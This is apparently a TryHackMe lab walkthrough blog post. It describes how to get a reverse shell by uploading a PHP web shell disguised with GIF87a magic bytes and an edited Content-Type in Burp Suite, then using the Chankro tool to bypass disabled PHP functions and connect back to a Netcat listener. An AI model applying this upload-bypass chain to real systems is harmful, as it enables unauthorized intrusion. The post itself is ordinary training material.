This Is a Info room in Tryhackme.
Let’s Begin
Ttrhe room has two sections.
The first section is Introduction with some description about PHP functions and with a tool named Chankro.
The installation process is also said there. It’s super simple just git clone & run
Now after reading that section Let’s move to Next section to get the Flag.
With the given IP, We saw a site like this…
If We go through all links it’ll redirect you to same page
except for the Apply Job link
If we click on this link We are getting redirect to a page where we can upload something.
And This is the place which we are looking for actually 😛
Let’s try to upload a php file.
I’m using a simple php reverse shell from
/usr/share/webshells/php directory.
You can also find this in your kali machine
But the site isn’t accepting the php file.It’s saying to Upload a real image
So Let’s capture the request with burpsuite
First capture the request of uploading an image file and send it to the repeater
The accepted files are marked in the above image.
Now send it to the repeater
Again capture the request of uploading a php file
P.S: I’ve renamed the php-reverse-shell.php file as kid.php
After sending it to the repeater I tried replacing application/x-php with iamge/jpeg & adding extension as kid.php.jpg
But it’s giving the same error
i’ve tried other extension. but got the success with GIF file
Let’s try with magic byte of GIF file
Let’s Edit GIF87a at the beginning of <?php [like below image]
And see if we are able to bypass it
It’s OK.That means we are able to upload it….
[P.S: i’ve ranmed the php reverse shell as boss.php]
Now we have to know the exact location of uploading file
let’s do it with gobuster
It is uploaded to http://<IP>://uploads
We also got a location of php configuration file named phpinfo.php
Next task is to start a Netcat listener and executing the php file we uploaded but it’s refusing our connection due to some filtering
So we have to know the exact location where we uploading to get the reverse shell back
Let’s read out the phpinfo.php file
There we should find the location
This is the location
And for bypassing filter we have to use Chankro Tool
Before that we have to make a bash file.Here is the bash file i’m using for getting reverse shell
Edit the IP as yours & Port as your choice
Then we are good to go with the Chankro tool
Let’s Break out the command for understanding
— arch = Architecture of system victim 32 o 64. Here it’s 64
— input = file with your payload to execute.Here it’s c.sh
— output = Name of the PHP file you are going to create; this is the file you will need to upload. Here I gave it a name boss.php
— path = It is necessary to specify the absolute path where our uploaded PHP file is located. For example, if our file is located in the uploads folder DOCUMENTROOT + uploads. we got the location from phpinfo.phpwhich is /var/www/html/fa5fba5f5a39d27d8bb7fe5f518e00db
Then back to the upload page.
Turn on foxyproxy and also the interception in Burpsuite
Select the newly created file which we got from Chankro
After capturing send the request to the repeater
Edit same as we done before [GIF87a at the beginning of <?php]
Now it’s uploaded
Ready your Netcat
Then navigate to the uploads folder
Hold Your Breath and Click on it
If everything is done correctly you should get a shell on Netcat
Then for getting the flag let’s move to the home folder
Let’s cd to s4vi and list out
then there is the flag.txt
So Here We Finished.
Let’s hope to see you again with some juicy stuff.
Untill Then This is badboy_17 & I really do Thank you for joining with me.♥️